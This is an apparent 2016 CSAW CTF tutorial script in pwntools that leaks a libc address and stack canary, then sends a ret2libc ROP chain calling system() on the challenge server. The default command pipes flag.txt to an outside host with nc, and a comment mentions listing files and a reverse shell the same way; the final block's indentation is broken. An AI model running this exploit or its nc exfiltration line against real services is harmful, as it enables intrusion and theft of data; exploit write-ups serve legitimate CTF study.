2016 CSAW CTF Tutorial
by St1tch
from pwn import *
import stitch
# Set to True to attack a local copy of the service (e.g. under a debugger).
local = False

# Pick the target: a local instance on 8005, otherwise the 2016 CSAW host.
s = remote('localhost', 8005) if local else remote('pwn.chal.csaw.io', 8002)

# Block until Enter is pressed so a debugger can be attached to the service
# before any input is sent.
raw_input()
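def _parse_leak(line):
    """Return the integer address that follows the first ':' in *line*.

    ``int(text, 16)`` already accepts surrounding whitespace and an optional
    ``0x`` prefix, so nothing has to be stripped by hand.  The previous
    ``str.strip('0x')`` removed the *characters* ``0`` and ``x`` from both
    ends of the string and would have eaten the trailing zeros of an address
    such as ``0x7f...800`` whenever no newline followed it.
    """
    return int(line.split(':')[1], 16)


def _build_payload(canary, poprdi, rbp, system, cmd):
    """Build the ret2libc chain sent through menu option 2.

    Layout, as offsets from the start of the overflowed buffer:
      0x000  filler up to the stack protector
      0x138  canary (the leaked value, so the check still passes)
      0x140  saved rbp (any value)
      0x148  pop rdi; ret
      0x150  rbp + 32 -> where *cmd* is expected to sit on the stack
      0x158  system
      0x160  *cmd*, NUL-terminated
    The ``rbp + 32`` distance is taken from the original exploit and is tied
    to this binary's frame layout — re-derive it if the offsets change.
    """
    if not cmd.endswith('\x00'):
        cmd += '\x00'          # system() reads a C string
    chain = [
        'a' * 0x138,
        p64(canary),
        'a' * 8,
        p64(poprdi),
        p64(rbp + 32),
        p64(system),
        cmd,
    ]
    return ''.join(chain)


def solve(cmd='cat flag.txt | nc kimtae.xyz 8888\x00'):
    """Run the three-stage exploit over the module-global tube ``s``.

    1. Menu option 1 prints a libc address.  Add the fixed delta back to get
       ``puts``, fingerprint the libc with ``stitch.find_libc`` on the low
       12 bits (the page offset, which ASLR leaves untouched) and derive
       ``system`` plus a ``pop rdi; ret`` gadget.
    2. Menu option 2 sends data back after a 0x137-byte input; per the
       original exploit, after skipping 0x138 bytes the next 8 are the stack
       canary and the next 4 the low half of the saved rbp.
    3. Menu option 2 again with a ROP chain calling ``system(cmd)``, where
       *cmd* is placed on the stack at ``rbp + 32``.

    Parameters:
        cmd: shell command executed on the target via ``system``; a trailing
            NUL is appended if missing.  NOTE(review): the default pipes the
            flag in cleartext to the blog author's listener
            (``kimtae.xyz:8888``) — re-running the script unchanged ships the
            target's flag to that third party.  Point it at a listener you
            control, or spawn ``/bin/sh`` and read the flag over the existing
            connection instead.

    Uses the module globals ``s`` (pwntools tube) and ``p`` (progress
    logger).

    Raises:
        RuntimeError: if no known libc matches the leaked ``puts`` address.
    """
    # ---- stage 1: libc leak -------------------------------------------
    p.status('leak puts addr')
    s.recvuntil('>')
    sleep(1)
    s.sendline('1')
    # The printed address is presumably puts - 0x500 (the original added
    # 1280 back); confirm against the binary if the resolved symbols look
    # wrong.
    puts = _parse_leak(s.recvuntil('\n')) + 0x500
    # Only the low 12 bits survive ASLR, so key the libc lookup on those.
    low12 = '%03x' % (puts & 0xfff)
    matches = stitch.find_libc({'puts': low12})
    if not matches:
        # Indexing an empty result used to die with a bare IndexError.
        p.failure('no libc matched puts & 0xfff = %s' % low12)
        raise RuntimeError('unknown libc: puts ends with %s' % low12)
    libc = matches[0]
    base = puts - libc['puts']
    poprdi = base + libc['poprdi_ret']
    system = base + libc['system']
    log.success('puts addr = %s' % hex(puts))
    log.success('system addr = %s' % hex(system))
    log.success('poprdi addr = %s' % hex(poprdi))

    # ---- stage 2: canary / stack leak ---------------------------------
    p.status('leak canary')
    s.recvuntil('>')
    sleep(1)
    s.sendline('2')
    sleep(1)
    s.recvuntil('>')
    # 0x137 bytes plus sendline's '\n' fill exactly 0x138 bytes.
    s.sendline('a' * 0x137)
    # recv(n) may return fewer than n bytes on a slow link; recvn blocks
    # until exactly n arrive, so the unpacks below never see a short read.
    s.recvn(0x138)
    canary = u64(s.recvn(8))
    # Only the low 32 bits of the saved rbp are read here; the high half is
    # assumed to be 0x00007fff.  The top of the stack is not fixed under
    # ASLR, so this is a guess that succeeds only part of the time — re-run
    # the script if the shell does not come back.
    rbp = 0x00007fff00000000 + u32(s.recvn(4)) - 48
    log.success('rbp = %s' % hex(rbp))
    log.success('canary = %s' % hex(canary))

    # ---- stage 3: ROP to system(cmd) ----------------------------------
    p.status('remote shell!')
    s.recvuntil('>')
    sleep(1)
    s.sendline('2')
    s.recvuntil('>')
    # Other commands the author tried: 'ls | nc kimtae.xyz 8888' and a
    # reverse shell built from two nc pipes around /bin/sh.
    pay = _build_payload(canary, poprdi, rbp, system, cmd)
    sleep(1)
    s.sendline(pay)
    p.success('Sending cmd!')
    s.interactive()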
if __name__ == '__main__' :
# Kept module-global on purpose: solve() reports its phases through `p`.
p = log.progress('Start pwning...')
solve()